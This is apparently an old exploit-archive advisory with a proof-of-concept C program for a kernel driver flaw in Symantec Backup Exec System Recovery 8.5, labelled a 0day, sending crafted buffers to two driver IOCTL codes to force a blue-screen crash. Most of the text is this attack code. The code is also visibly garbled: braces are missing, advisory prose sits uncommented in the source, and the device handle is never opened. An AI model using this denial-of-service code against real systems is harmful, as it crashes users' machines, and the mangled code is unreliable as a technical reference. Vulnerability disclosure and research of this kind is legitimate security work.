Symantec Backup Exec System Recovery 8.5 - Kernel Pointers Dereferences 0day 2011-05-12 12:15:04

#include <stdio.h>
#include <windows.h>
#include <winioctl.h>
#include <stdlib.h>
#include <string.h>

Program : Symantec Backup Exec System Recovery 8.5 - 0day
Homepage : http://www.symantec.com
Discovery : 2009/12/23
Author Contacted : 2011/04/01 - No reply
Author Contacted : 2011/04/29 - No reply... again !
Patch Updated : Not now
Found by : Heurs
This Advisory : Heurs
Contact : [email protected]

//----- Application description

Symantec Backup Exec System Recovery 8.5 is a complete disk-based system
recovery solution for Microsoft Windows based servers, desktops, and laptops
that allow businesses to recover from system loss or disasters in minutes, not
hours or days - even when recovering to a dissimilar hardware platform; to a
virtual environment; or to a remote, unattended location. In short, this
powerful solution gives an administrator unprecedented power in meeting
ambitious recovery time objectives and service-level agreements.

//----- Description of vulnerability

GEARAspiWDM.sys (the CD / DVD filter) driver don't check all inputs of an IOCTL.
An exception can be thrown if we modify one byte.
With my test I can't do best exploitation than a BSOD.

//----- Credits


s.leberre at sysdream dot com
heurs at ghostsinthestack dot org


int __cdecl main(int argc, char* argv[])
HANDLE hDevice = (HANDLE) 0xffffffff;
DWORD NombreByte;
DWORD Crashing2[] = {
0x98521a4e, 0x35c9b325, 0x329aded9, 0x2b89a43f,
0x9e338a58, 0x54372b5f, 0x1c6164bb, 0x439b3b32,
0x7ffa3ca5, 0x90ee3512, 0xb3be1b06, 0x9363dad1,
0x1f91adea, 0xcc611f7e, 0xdf527cc9, 0xb0856250,
0x4a0d92ff, 0x7b57a9fd, 0xe438ef46, 0x013ac977,
0xb6ce60fc, 0x6042a1f8, 0xe4da87f0, 0x118e4887,
0x47ea6b36, 0xfb83daa8, 0xd50ff81b, 0xfd3c97c9,
0xd743656a, 0x8b7318b7, 0x955d2607, 0x0cb6d64f,
0x3acc85fb, 0xca8f44d3, 0x2859a3de, 0x80fdabb1,
0x63b5fc1d, 0x9b2b73d7, 0x16038535, 0xb8072dca,
0xda4edb5a, 0xe7e89f58, 0xd2b0d395, 0x64b404a4,
0x422f6292, 0xafb88db2, 0xefee2383, 0x2034e944,
0x9c7f782e, 0x40d0b37e, 0x95c621e1, 0xc67d9c45,
0xf4bfc4d8, 0xa6b50be6, 0xaf327fcf, 0x8ea76c13,
0x85bf39d2, 0x3224f445, 0xf13ffd4d, 0x8a0ed02e,
0x11768b7f, 0x05da276b, 0xc264c7de, 0x70038327,
0x9f965ab9, 0x7bd47648, 0xfbe34062, 0x94e5540f,
0xe41cc6c2, 0x5b4a2559, 0x429e5122, 0x83c913e4,
0xca98e661, 0xbd3ad1fe, 0x972a24c2, 0xb77b0b77,
0x48e31285, 0x77dd9743, 0x42374f25, 0xdf841c34,
0x5aa3d162, 0x4f8cf953, 0xbc2ada9d, 0xa4cad244,
0x9080a47f, 0x27af163a, 0xf8e5b0e1, 0x80248421,
0x963b4b99, 0x2ca00d49, 0x81b3ef37, 0xc2466b09,
0x46ccb43a, 0xff10f2f9, 0xac712349, 0x5ad59d96,
0xd978b259, 0xcbcfeca1, 0x98273614, 0x332f6c59,
0xa486d4ee, 0x7fad0d57, 0xf65601c1, 0xeb1e6321,
0x50408419, 0x5190a0e8, 0xb3cc3374, 0xeabd4a3d,
0xd236b852, 0x92cba4db, 0x4e52f33a, 0xa9f488cb,
0x067d88e4, 0xd31d588d, 0x47aa2c28, 0xf0918cb3,
0x46c518af, 0x430a2c52, 0xc49fc7ca, 0x49e7d5f0,
0x6cd26dbc, 0xd83fde69, 0x926c03ba, 0xb4850695,
0x9235d279, 0xaa1ffa33, 0x996f4d09, 0xbfed8fa0,
0x30cff2cc, 0x1f21d5c3, 0x38c3f62b, 0x8291db1e,
0xb536c7e0, 0x3c705ff0, 0x23f180a2, 0xdbb6059e,
0x4dd9351a, 0x231487bc, 0x915fe713, 0x87616e77,
0xdbcb473e, 0x1a830215, 0x8cbba20a, 0x902a03d8,
0xfcf9b1eb, 0xca69f2be, 0x44a96ca3, 0xa7d7aaab,
0x8949408f, 0xc9d0d1e2, 0x2775a41c, 0x71f381ff,
0xba970686, 0x222a18f5, 0xfab74884, 0xb53efcb4,
0xfbb46a7a, 0x1de45c9f, 0xbb5838ad, 0x274cfd1b,
0xa841ffcb, 0x02f17a83, 0x18fe4da2, 0xa4a1b953,
0x788a1f92, 0x8a0c5b81, 0x54b69f16, 0x570abe6b,
0x7e58db8e, 0x1d6d7245, 0x0f6f7b5e, 0x7121c421,
0xefa6a254, 0xb1fd7db2, 0xc9bc5216, 0x2ae57c8d,
0xa9ccba01, 0x1e375901, 0x0fe3e83b, 0x729f90db,
0x4e054937, 0x9861523c, 0x644cc902, 0xf23b2474,
0x599a913f, 0x32ccfcd9, 0x7f3ca050, 0x3de365f6,
0x55ca0856, 0x72113509, 0x188f3b56, 0x4fa1b960,
0x403d751a, 0xfeb043d7, 0x5b451a9d, 0x52cdfdf4,
0x7c84854c, 0xaea8abc2, 0x1f690135, 0x0d98ac73,
0x90d3fb36, 0x92c4c71c, 0xa329ece4, 0xffe6a577,
0x70a4829e, 0x9fd6b0b7, 0x13ec771e, 0xa8724de2,
0xa8d25ffb, 0x84b00cce, 0xa1791d95, 0xe6a5cb04,
0xd0460421, 0x0fa785ea, 0x0521dfea, 0x6b745113,
0xc3512018, 0x3613d26c, 0x5fcebf1f, 0x6dd6a8ed,
0xf29a61ce, 0x66e0c099, 0x2bff4910, 0x6e92dbdd,
0xafce203a, 0xed07a42b, 0x657cd627, 0xcc05e18f,
0x848aa8cd, 0x5db76bf0, 0x66feef0f, 0x36fefa72,
0xac75a2fa, 0x8cd0ec62, 0x2805f29c, 0x3f9af683,
0xedc84ed5, 0xcafa4942, 0x29f94618, 0x80d6f110,
0x924035d0, 0x239cfd83, 0x4251cea1, 0xf54575db,
0x3c9815b4, 0xcb86e9df, 0xe0a46e7b, 0x8feb5e66,
0x17dee85f, 0xcf9d26f4, 0x6afe496e, 0x3e8c1322,
0xe6f99038, 0xd4735c42, 0x760d0bd6, 0xb43c3c60,
0x788de1ce, 0xf52c1d56, 0xa6d31938, 0x275cb624,
0x9ae96c95, 0x194068c6, 0xe5eee0a2, 0x2ee7d840,
0xdd82ba28, 0x3435826a, 0x9a486fc3, 0x2701aa59,
0x6c362b8f, 0x4e5d96a6, 0x1bdc57f7, 0x754c2319,
0x71380617, 0x90542310, 0x65d72160, 0x3f77356e,
0x41e648e9, 0x250870ae, 0x29f398a2, 0x1b980674,
0x8d41476f, 0x9b9ec36a, 0x017d514a, 0x75badffc,
0x0ca9dccf, 0xb1fb1936, 0x6ca3bdd7, 0xc5fd39b8,
0x8d6878ba, 0x1769e6dc, 0xac396388, 0xaaa92090,
0xea758f25, 0x250ece7a, 0x84a575fb, 0x08f09242,
0xe983aa84, 0x06a02443, 0x047accd5, 0x86814c54,
0xae978f01, 0x2a8df4b7, 0x5079e1f7, 0x4599b151,
0x4b06b065, 0x0fa58f90, 0x11e0624c, 0xc3a3f881,
0xf795fe91, 0x9e9542c6, 0x37262888, 0x21dfb940,
0x695be284, 0x28d116e1, 0x7f81a807, 0x308a5e2b,
0x0312f4a5, 0xe77753d6, 0xa834b6dc, 0xc6f0f403,
0xa6a2b904, 0xeb26b1a4, 0x69849a3d, 0x8313560d,
0xe23d7a4b, 0xe96b1262, 0xe94255fb, 0x3901b1e9,
0x351d887b, 0x9e594997, 0xfe8f414c, 0x96f07011,
0xe68fc42c, 0xb38e30a2, 0x1994ef3a, 0x3efbfce9,
0x8b8f3a7f, 0xca93784e, 0x5f3181d7, 0xc84f06eb,
0x8ded82a7, 0x41300e14, 0xb478751b, 0xeeae732c,
0x392889a8, 0xb79591f1, 0xca8bb59d, 0x33d5ac3f,
0xcab7ffb1, 0x1c023d41, 0xf4d85961, 0xec42794f,
0xd3e126b0, 0x572fe83b, 0x7b3ea605, 0x4bfa2f3b,
0x595b381d, 0x0f1f55dd, 0xf07401fd, 0x322c17b4,
0x7ac23729, 0x9e747fa4, 0x648391dc, 0x684f5e6f,
0x6f672b78, 0xe57a7f45, 0x5fea1b7a, 0x562401c8,
0xa640bafe, 0x22a1ea24, 0x90a358c5, 0x2fa7712f,
0x75505628, 0xab0d1b9b, 0x7f40ccba, 0x74034eaf,
0xc7be1659, 0x35a10242, 0xcd61afed, 0x6a4f3f61,
0x6793d2e8, 0xb447eded, 0x81b09579, 0x8c57ec03,
0x7f89ca0d, 0xb75faf20, 0x6977fa05, 0x9d272f79,
0xaa90665a, 0x91fcc55b, 0xfa06b20e, 0xfcb48f7a,
0xce1760ed, 0x58dc9e13, 0x99152bc4, 0x9021e937,
0xfbc15bc5, 0xc49ab6cf, 0xfe322467, 0x1cda3004,
0x01badd03, 0x28308712, 0x05708f56, 0x612f4410,
0x3345bdfd, 0x0b3a8804, 0x36b0b314, 0xaf8b63a5,
0x90ca55ab, 0x1f946e9e, 0xecb27651, 0x7e5c8406,
0xd3f8fc3b, 0x1e30cf60, 0x3ac797fa, 0x48d3a898,
0xf4a6080d, 0x680e7e2e, 0x745388ff, 0x8027ded5,
0x461989ac, 0x5426a0a9, 0xa1ecc4a8, 0x3862c461,
0xda87b1ce, 0x9dbc1647, 0x225898f0, 0xf72d47fe,
0x0af3377d, 0xc5c569e7, 0xb8d8fb7a, 0x0c46c695,
0x508d9e3f, 0xc4a96a93, 0xef7450d3, 0x14860105,
0x9e5518bc, 0x56a024ee, 0xc1d14889, 0x9e9029ae,
0x06700d49, 0x5b4655a3, 0xe7c7e1be, 0x596c98b5,
0xf91d9006, 0x5daf3db2, 0xdbd3dea9, 0x2f1471d9,
0x5d26bd87, 0x7758e268, 0x6d6f3ab4, 0x45c55824,
0x60e4cf0e, 0x54c2b90d, 0x0317c728, 0xca7681b6,
0xb2813304, 0x14fb642e, 0x6297a465, 0x51f7b685,
0x24192969, 0x44b44d6f, 0x66cfe7ae, 0x8ff6a5a9,
0x772a7a50, 0x11d0163e, 0x598113c9, 0x3a03fef9,
0xff9c1a9b, 0xdbd7c110, 0x09b9282e, 0xb19a1723,
0x61d551ad, 0x4edd912c, 0x73cbe308, 0x2d507924,
0x8b6adc6a, 0x7249e4c5, 0xd46b6c78, 0x1a79ed3d,
0x35fc9732, 0x4f3c7746, 0x34537beb, 0xc7a4e647,
0xe524af91, 0x208894fa, 0xae2dc193, 0x7db25b89,
0x8cd21de4, 0x5cdaa83a, 0xf973bed3, 0x6ca77231,
0x6b6d299a, 0xa017dcfd, 0x53ea60d1, 0xe31720ba,
0xf406d12f, 0x8167076d, 0xb62a7ba8, 0x83a54a0d,
0x838c6ffc, 0xcd7b5253, 0x4b49b33b, 0x8ece311d,
0x5001914b, 0x1fcc872f, 0x36192027, 0x26889789,
0xb26a39d4, 0x69ce1d9e, 0x41d01758, 0x9ea92324,
DWORD Crashing1[] = {
0x34e4fa15, 0xd60f859b, 0x45470f01, 0x73415241,
0x66206970, 0x4e20726f, 0x45470054, 0x6f505241,
0x50207472, 0x6e00506e, 0xacea16d8, 0xef58b300,
0x36609f08, 0xf826b866, 0x06257426
BYTE Out[0x04];
BYTE Response[32];

printf("Kernel Pointers Dereferences - Symantec Backup Exec System Recovery 8.5 (0day)\n\n");
printf("Crashs possibles : \n1 : DeviceIoControl 0x00222008\n2 : DeviceIoControl 0x00222010");
printf("\nSelect the crash : ");
scanf("%c", &Response);

if (Response[0] == 0x32) {
if (DeviceIoControl(hDevice,0x00222010,Crashing2,sizeof(Crashing2),Crashing2,sizeof(Crashing2),&NombreByte,NULL) == 0) {
printf("Error : DeviceIoControl : %d\n", GetLastError());
if (Response[0] == 0x31) {
if (DeviceIoControl(hDevice,0x00222008,Crashing1,sizeof(Crashing1),Crashing1,sizeof(Crashing1),&NombreByte,NULL) == 0) {
printf("Error : DeviceIoControl : %d\n", GetLastError());

return 0;